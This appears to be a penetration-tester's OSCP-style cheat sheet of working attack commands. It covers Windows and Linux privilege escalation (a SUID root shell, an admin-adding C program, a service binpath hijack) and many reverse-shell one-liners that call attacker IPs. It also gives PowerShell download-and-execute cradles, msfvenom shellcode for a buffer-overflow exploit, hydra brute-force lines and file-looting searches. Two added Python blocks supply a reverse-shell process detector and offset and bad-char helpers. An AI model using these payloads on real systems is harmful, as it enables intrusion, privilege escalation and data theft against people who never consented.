echo [System.Diagnostics.Process]::Start("C:\xampp\webdav\rev.exe","", $mycreds.Username, $mycreds.Password, $computer) >> run.ps1
powershell -ExecutionPolicy Bypass -File run.ps1

echo $username = 'alice' > startprocess.ps1
echo $password = 'aliceishere' >> startprocess.ps1
echo $securePassword = ConvertTo-SecureString $password -AsPlainText -Force >> startprocess.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securepassword >> startprocess.ps1
echo Start-Process 'C:\Users\Public\nc.exe' -ArgumentList '-e cmd.exe 10.11.0.192 9999' -Credential $credential >> startprocess.ps1

* Windows helpers

useradd.c

* Windows - add a user and put it in the local Administrators group.

#include <stdlib.h> /* system */

int main(void)
{
    /* replace <username> and <password> before compiling */
    system("net user <username> <password> /add && net localgroup administrators <username> /add");
    return 0;
}

# Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c

SUID

* Set real, effective and saved user ID to root and spawn a shell (for a root-owned SUID binary).

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setresuid(0, 0, 0);
    system("/bin/bash");
    return 0;
}

# Compile
gcc suid.c -o suid

Powershell Run as

* Run a file as another user with PowerShell.

echo $username = '<username>' > runas.ps1
echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1

Process Monitor

* Monitor the process list to spot cron jobs and other periodically started commands.

#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps -eo command)

while true; do
    new_process=$(ps -eo command)
    # print only the lines that appeared (>) or disappeared (<) since the last sample
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process
done

* Powershell Empire
in empire:
listeners
uselistener http
set Host http://10.10.14.30:443
set Port 443
execute
launcher powershell
copy output to a file empire.ps1 serving on local apache

in burp:
.. downloadString(‘…/empire.ps1

in empire:
interact agentid
searchmode PowerUp
usermodule privesc/powerup/allchecks
info
execute

* PowerUp.ps1
add the end: Invoke-AllChecks

when having code execution via .asp/.php/…
?fexec=echo "IEX(New-Object Net.WebClient).DownloadString('http://myip/PowerUp.ps1')" | powershell -noprofile -

* Sherlock
Sherlock.ps1
grep -i function Sherlock.ps1
Find-AllVulns
at the end append: Find-AllVulns

* Check if OS is 64bit
Powershell.exe
[environment]::Is64BitOperatingSystem

* Check if current process is a 64bit Process
[environment]::Is64BitProcess

Directories
SysWOW64: the 32-bit system binaries on a 64-bit Windows; a 32-bit process that asks for System32 is silently redirected here (WoW64 file system redirection)
SysNative: virtual alias through which a 32-bit process reaches the real 64-bit System32

* when running as a 32-bit process on a 64-bit OS, call the 64-bit PowerShell via
C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe

WIN XP SP0/SP1 local priviledge escalation
================================
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"

sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
nc -lvp 9988
net start upnphost

#list properties
sc qc "Vulnerable Service"
# check privileges
sc qprivs "Service name"

net user /add gamma gamma
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe"
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.192 6666 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""

LINUX PRIVILEDGE ESCALATION
===========================

* What files run as root / SUID / GUID?:

find / -perm -2000 -user root -type f -print 2>/dev/null
find / -perm -1000 -type d 2>/dev/null # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - runs as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - runs as the owner, not the user who started it.
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID (parentheses needed: -o binds weaker than the implicit -a)

for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done

find / \( -perm -g=s -o -perm -4000 \) ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

* What folders are world writeable?:

find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders

SHELL SPAWNING
==============
python -c 'import pty; pty.spawn("/bin/sh")'
CTRL-Z
stty raw -echo
fg
stty size      (run locally first to get your terminal size)
stty rows 48 columns 120

echo os.system('/bin/bash')    (from within a Python shell)
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh"
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh
(from man page)
!/bin/sh

Spawning a shell directly

The system you’re in might not have Python or Perl, but that doesn’t mean you won’t get a shell. You can try simply calling the shell directly from your session:

$ /bin/sh -i


Interesting Files for Dirbuster Bruteforcing:
==============
mbox.bz2
mbox

WWW Directory enumeration
————————–
dirb http://10.11.1.72 /usr/share/wordlists/dirb/small.txt -x extensions_common.txt

based on Web Application:
/usr/share/seclists/Discovery/Web-Content

Windows SMB enumeration
———————–
* enum4linux -a <host>

* ms08-067
nmap -sU -sS --script smb-vuln-ms08-067.nse -p U:137,T:139 10.11.1.5

* os detection
nmap -v -p 139,445 --script=smb-os-discovery 10.11.1.227

* smb security mode
nmap -v -p 139,445 --script=smb-security-mode 10.11.1.236

* some checks
nmap -vvv -sU -sS --script smb-enum-users,smb-enum-shares,smb-os-discovery,smb-protocols,smb-security-mode,smb-system-info,smb2-capabilities,smb2-security-mode,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061 --script-args=unsafe=1 -p U:137,T:139 10.11.1.5

SMB Enumeration

SMB OS Discovery
nmap $ip --script smb-os-discovery.nse

Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254

Netbios Information Scanning
nbtscan -r $ip/24

Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip

Nmap all SMB scripts scan

nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip

Nmap all SMB scripts authenticated scan

nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args smbuser=<username>,smbpass=<password>,unsafe=1 $ip

SMB Enumeration Tools
nmblookup -A $ip

smbclient //MOUNT/share -I $ip -N

rpcclient -U “” $ip

enum4linux $ip

enum4linux -a $ip

SMB Finger Printing
smbclient -L //$ip

Nmap Scan for Open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24

Nmap scans for vulnerable SMB Servers
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
(smb-check-vulns was removed from newer nmap releases; use the smb-vuln-* scripts instead)

Nmap List all SMB scripts installed
ls -l /usr/share/nmap/scripts/smb*

Enumerate SMB Users

nmap -sU -sS –script=smb-enum-users -p U:137,T:139 $ip-14

OR

python /usr/share/doc/python-impacket-doc/examples/samrdump.py $ip

RID Cycling – Null Sessions
ridenum.py $ip 500 50000 dict.txt

Manual Null Session Testing

Windows: net use \\$ip\IPC$ "" /u:""

Linux: smbclient -L //$ip

Port Scan
==========

* TCP portscan using netcat
nc -nvv -w 1 -z 10.0.0.19 3388-3390

* UDP portscan using netcat
nc -u -nvv -w 1 -z 10.0.0.19 3388-3390

* Ping sweep
nmap -sn 10.11.1.1-254

Compile exploit
==============
gcc -Wl,--hash-style=both -o sock sockpage.c

Reverse Shell Cheat Sheet
========================

* Bash reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i >& /dev/tcp/192.168.178.102/5555 0>&1

* Bash Reverse Shell
exec 5<>/dev/tcp/attackerip/4444
exec 5<>/dev/tcp/192.168.178.102/9999
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done

* Perl reverse Shell
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

* Perl reverse shell

perl -e 'use Socket;$i="10.11.0.112";$p=53;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

* Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.192",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.102",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.102",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.101",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.192",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["c:\\windows\\system32\\cmd.exe",""]);'

* PHP reverse shell
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.178.102",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

* PHP meterpreter reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.122.13 LPORT=443 -f raw > code.php

* php-reverseshell
cp /oscp/reverse_shells/php/php-reverse-shell-1.0/php-reverse-shell.php rev.php

* PHP simple shell Linux
<?php $cmd=$_GET['cmd']; echo `$cmd`; ?>

* Ruby Reverse shell
ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

* Ruby Reverse Shell target windows
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

* Netcat reverse Shell
nc -e /bin/sh 10.0.0.1 1234

* Netcat reverse Shell Bash
/bin/sh | nc attackerip 4444
/bin/sh -i | nc 192.168.178.102 9999

* Netcat reverse Shell without nc -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.0.192 5555 >f
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.178.102 9999 >f
mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.178.102 9999 >f

* Netcat Reverse Shell without bash
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p

* Java reverse shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

* xterm
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip

* Telnet reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p
rm -f p; mknod p p && telnet 192.168.178.102 9999 0<p | /bin/sh 1>p
rm -f p; mknod p p && telnet 10.10.10.101 9999 0<p | /bin/sh 1>p

* Telnet Reverse Shell
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp
telnet 192.168.178.102 5555 | /bin/bash | telnet 192.168.178.102 4445 # Remember to listen on your machine also on port 4445/tcp

* Shell from TCPDUMP
echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

* From within IRB:
exec "/bin/sh"

* From within vi:
:!bash or
:set shell=/bin/bash:shell

* From within vim
:!bash

* From within nmap:
sudo nmap --interactive
nmap> !sh
sh-4.1#

* Windows Powershell/Unicorn Reverse Shell
cd /opt/unicorn
python unicorn.py windows/meterpreter/reverse_https X.X.X.X 4444
Payload for code execution:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://foobar/unicorn.txt')"
cp powershell_attack.txt /var/www/html/
msfconsole -r unicorn.rc
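Seen from the host being defended, the one-liners in this section share a small set of command-line fingerprints: a `/dev/tcp/` redirection, `nc -e /bin/sh`, a FIFO or `/bin/sh -i` piped into nc or telnet, socket-plus-dup2 in Python, fsockopen-plus-exec in PHP. The following Python is an added detection example written for these notes, not code from the original notes or from any tool named here: it applies those fingerprints to the output of `ps -eo pid,user,args` and reports the matching processes. The process listing embedded below is constructed; its command lines are taken from the cheat sheet above plus a benign netcat port scan to show the rules stay quiet on ordinary nc use.

```python
import re

# Command-line fingerprints of the reverse-shell one-liners in the cheat sheet.
# Each rule is a compiled regex applied to a single process command line.
RULES = {
    # bash -i >& /dev/tcp/host/port 0>&1  (also exec 5<>/dev/tcp/host/port)
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+"),
    # nc -e /bin/sh host port  (any -e style flag followed by a shell or cmd.exe)
    "nc_exec_flag": re.compile(
        r"\b(nc|ncat|netcat)\b.*\s-[A-Za-z]*e\s+(/bin/(ba)?sh|cmd(\.exe)?)"),
    # mkfifo/mknod pipe that later feeds nc or telnet
    "fifo_to_net": re.compile(
        r"(mkfifo|mknod\s+\S+\s+p)\b.*(\||&&|;)\s*(nc|ncat|netcat|telnet)\b"),
    # /bin/sh -i 2>&1 | nc host port
    "shell_piped_to_net": re.compile(
        r"/bin/(ba)?sh(\s+-i)?(\s+2>&1)?\s*\|\s*(nc|ncat|netcat|telnet)\b"),
    # python -c 'import socket...;s.connect(...);os.dup2(...)'
    "python_dup2_socket": re.compile(r"socket\.socket\(.*\.connect\(.*dup2\("),
    # php -r '$sock=fsockopen(...);exec(...)'
    "php_fsockopen_exec": re.compile(
        r"fsockopen\(.*\b(exec|system|shell_exec|popen|proc_open)\("),
    # ruby -rsocket -e 'TCPSocket.open(...);exec ...'
    "ruby_tcpsocket_exec": re.compile(r"TCPSocket\.(open|new)\(.*\b(exec|popen)\b"),
    # perl IO::Socket::INET / sockaddr_in followed by exec or system
    "perl_socket_exec": re.compile(r"(IO::Socket::INET|sockaddr_in).*\b(exec|system)\b"),
}

# Constructed sample of `ps -eo pid,user,args` output (not a real capture).
SAMPLE_PS = """\
  PID USER     COMMAND
  412 root     /usr/sbin/sshd -D
  877 www-data /bin/sh -c bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
  901 www-data nc -e /bin/sh 10.0.0.1 1234
  933 deploy   nc -nvv -w 1 -z 10.0.0.19 3388-3390
  950 www-data python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
  977 www-data sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
  990 www-data sh -c rm -f /tmp/p; mknod /tmp/p p && nc 10.0.0.1 4444 0</tmp/p | /bin/sh 1>/tmp/p
 1002 alice    vim notes.txt
"""


def parse_ps_line(line):
    """Split one `ps -eo pid,user,args` line into (pid, user, command).
    Returns None for the header line or anything that is not a process row."""
    parts = line.strip().split(None, 2)
    if len(parts) < 3 or not parts[0].isdigit():
        return None
    return parts[0], parts[1], parts[2]


def scan_process_list(ps_output):
    """Return [(pid, user, [matched rule names])] for every process whose
    command line trips at least one rule, in listing order."""
    hits = []
    for line in ps_output.splitlines():
        parsed = parse_ps_line(line)
        if parsed is None:
            continue
        pid, user, cmd = parsed
        matched = [name for name, rx in RULES.items() if rx.search(cmd)]
        if matched:
            hits.append((pid, user, matched))
    return hits


if __name__ == "__main__":
    for pid, user, rules in scan_process_list(SAMPLE_PS):
        print("pid %s (%s): %s" % (pid, user, ", ".join(rules)))
```

On a live host, feed the script `ps -eo pid,user,args --no-headers` (or the equivalent from an EDR process-creation log); the rules key on the shape of the command line rather than on specific hosts or ports, which is why the port-scan line (pid 933) does not match while the `-e` form (pid 901) does.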

Good Users
==========
ftpuser:ftpuser
bob:lablab

Bruteforce
==========

HTTP POST FORM BRUTE FORCE
hydra -L ../usernames.txt -P /root/scripts/wordlist/CeWL/pw.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I

WORDPRESS ADMIN BRUTE FORCE
hydra -l admin -P cewl.txt 10.11.1.234 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.11.1.234%2Fwp-admin%2F&testcookie=1:F=ERROR" -I

WORDPRESS ENUMERATE USER NAME BRUTE FORCE
hydra -vV -L fsocity.dic.uniq -p wedontcare 192.168.2.4 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

WORDPRESS BRUTE FORCE PASSWORD
hydra -vV -l elliot -P fsocity.dic.uniq vm http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

HTTP .htaccess brute force
medusa -h 10.11.1.219 -u admin -P password-file.txt -M http -m DIR:/admin -T 10

HYDRA username variations as passwords
/root/scripts/hydra -l USERNAME -e nsr ftp://192.168.178.110
-e nsr additional checks: "n" tries a null password, "s" tries the login name as
password, "r" tries the reversed login name as password

HYDRA VERBOSE MODE
/root/scripts/hydra -v -V -u -L which_one_lol.txt -P which_one_lol.txt -t 1 troll ssh

IDENTIFY WINDOWS SERVICE PACK
=================================
C:\WINDOWS\System32

apphelp.dll -> SP3
xpsp1res.dll -> SP1
xpsp2res.dll -> SP2
xpsp3res.dll -> SP3

SHELL THROUGH MSSQL
===================
SA account has administrative permissions
-> msfconsole
use auxiliary/admin/mssql/mssql_exec
set RHOST 10.11.1.31
set PASSWORD xxxx
set CMD cmd.exe /c net user /add gamma gamma
run
set CMD cmd.exe /c net localgroup "Remote Desktop Users" gamma /add
run
set CMD cmd.exe /c net localgroup "Administrators" gamma /add
run
-> login through remote desktop

LINUX LOOTING
=============
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql

find / -name "*.txt"
find / -name "*.doc*"
find / -name "*.rar"
find / -name "*.xls*"
find / -name "*.doc"
find / -name "*.sql"

.ssh:
.bash_history

Linux Privilege Escalation
==========================
# World writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null

# World executable directories
find / -perm -o=x -type d 2>/dev/null

# World writable and executable directories
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null

* suid binaries
find / -perm /u=s -type f

* Cronjob
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
ls -al /etc/cron.d/
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

* World Writeable Directories

/tmp
/var/tmp
/dev/shm
/var/spool/vbox
/var/spool/samba

* Find mysql password
grep -Rni "DB_PASS" /
grep -Rni "DB_USER" /

* Look for running cron jobs (diff the process list once a second and print only the lines that appeared or vanished):
#!/bin/bash
# Loop by line
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
    new_process=$(ps -eo command)
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process
done

Cracking Passwords
==================

* Crack Raw MD5
john --format=raw-md5 hashfilepath

* Crack ZIP/RAR
zip2john zipfile > output.txt
rar2john rarfile > output.txt
-> then run john on output.txt

* brute force, lowercase charset (-c a), length 1-8
fcrackzip -b -c a -l 1-8 -u -v lmao.zip

* dictionary
fcrackzip -u -D -p passwordlist.txt lmao.zip

* generate password list
https://charlesreid1.com/wiki/John_the_Ripper/Password_Generation

cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
-> -m min word length 6
-> -w output to file

nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

* using Crunch
# crunch 6 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

Buffer Overflow
===============

# Payload
payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length>

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700

Find Offset of EIP in Buffer
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438

BadChars
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
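The pattern and bad-character steps above are normally done with the Metasploit scripts named here. The following Python is an added example written for these notes (it is not from the original notes and not Metasploit's code) that implements the same two steps so the numbers can be checked by hand: the cyclic pattern, the lookup from the EIP value back to its offset (the 2700-byte pattern and the 39694438 query above resolve to offset 2606), and a comparison of the bad-char block as sent against the bytes read back from the debugger that lists which characters were altered or cut the copy short. The EIP value and the dumped bytes are inputs you take from the debugger; the values used in the usage below are constructed.

```python
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern ("Aa0Aa1Aa2...") of exactly `length` chars.
    Every 4-byte window is unique (up to 20280 chars), so whatever lands in EIP
    identifies its own position in the buffer."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]   # pattern exhausted: 20280 unique chars max


def pattern_offset(pattern, eip_value):
    """Offset of the four bytes that overwrote EIP.
    `eip_value` is the register as the debugger shows it: an int such as
    0x39694438, or the same value as an 8-hex-digit string ("39694438").
    x86 is little-endian, so the value is unpacked with "<I" before searching."""
    if isinstance(eip_value, str):
        eip_value = int(eip_value, 16)
    try:
        needle = struct.pack("<I", eip_value).decode("ascii")
    except UnicodeDecodeError:
        raise ValueError("EIP value %#x cannot come from the pattern" % eip_value)
    offset = pattern.find(needle)
    if offset == -1:
        raise ValueError("EIP value %#x is not in the pattern" % eip_value)
    return offset


def badchar_string(exclude=(0x00,)):
    """Bytes 0x01..0xff in order (the candidate block above), minus bytes already
    known to be bad, so the memory dump can be compared position by position."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def diff_badchars(sent, observed):
    """Compare the bad-char block as sent with the bytes read back from memory.
    An altered byte is reported; if the copy stops short, the first missing byte
    is reported as the probable truncating character and the scan stops there."""
    bad = []
    for i, b in enumerate(sent):
        if i >= len(observed):
            bad.append(b)
            break
        if observed[i] != b:
            bad.append(b)
    return bad


if __name__ == "__main__":
    pat = pattern_create(2700)
    print("EIP 39694438 -> offset", pattern_offset(pat, "39694438"))
    # Constructed dump: 0x0a was turned into 0x00 and the copy stopped before 0x0d.
    sent = badchar_string()
    dump = bytearray(sent[:12])
    dump[9] = 0x00
    print("bad chars:", [hex(b) for b in diff_badchars(sent, bytes(dump))])
```

When a bad character is found, regenerate the block with `badchar_string(exclude=(0x00, 0x0a, ...))` and resend; the diff only makes sense when the sent block and the dump line up from the first byte, which is why the exclusion happens at generation time rather than by deleting bytes from the dump.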

In ImmunityDebug:
!mona modules
find a module that has:
rebase: false
safeseh: false
aslr: false
nxcompat: false

View -> Executable Modules
Right click -> view memory on that module
View Code in CPU

Find a JMP ESP
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp

!mona find -s "\xff\xe4" -m slmfc.dll

shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.192 LPORT=9999 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

* /bin/bash linux execve
msfvenom --platform linux -p linux/x86/exec -f py CMD="/bin/sh" -b '\x00\x0a\x0d' -a x86

shellcode keeps running when SLmail crashes
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.192 LPORT=9999 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" EXITFUNC=thread

* small shellcode

msfvenom -p windows/shell_reverse_tcp -a x86 -f python --platform windows LHOST=<ip> LPORT=443 -b "\x00" EXITFUNC=thread --smallest -e x86/fnstenv_mov

PROOF
=====

* Linux proof

hostname && whoami && cat proof.txt && /sbin/ifconfig

* Windows proof

hostname && whoami.exe && type proof.txt && ipconfig /all

JPEG Analysis
=============

exiftool a.jpg
binwalk a.jpg

WEBDAV
======
* davtest -url http://foobar:80
-> test what file extensions are allowed to be uploaded

TFTP
====
I use the SolarWinds free TFTP server on Windows (and allow UDP port 69 through my Windows firewall).

on XP target run

C:\Users\Administrator>tftp -i 10.11.0.112 GET evil.exe
Transfer successful: 59392 bytes in 10 second(s), 5939 bytes/s

FTP
===

root@kali# apt-get install python-pyftpdlib
root@kali# python -m pyftpdlib -p 21
c:\users\jacco>type ftp-commands.txt
ftp
open 192.168.178.12 21 
USER
anonymous 
anonymous
USER
anonymous 
anonymous
bin 
GET nc.exe

c:\users\jacco>ftp -s:ftp-commands.txt

https://vulp3cula.gitbook.io/hackers-grimoire/windows-basics
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

A simple way to download files on machines that have PowerShell installed is shown below.
C:\Users\jacco> echo $storageDir = $pwd > wget.ps1
C:\Users\jacco> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\Users\jacco> echo $url = "http://192.168.178.12/nc.exe" >>wget.ps1
C:\Users\jacco> echo $file = "new-ncexploit.exe" >>wget.ps1
C:\Users\jacco> echo $webclient.DownloadFile($url,$file) >>wget.ps1

Now, we can use PowerShell to run the script and download our file:

C:\Users\jacco> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
root@kali:~/pwk/tftp# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.178.15 - - [11/Jun/2019 05:46:35] "GET /nc.exe HTTP/1.1" 200 -
C:\Users\jacco>new-ncexploit.exe -lvp 443
listening on [any] 443 ...


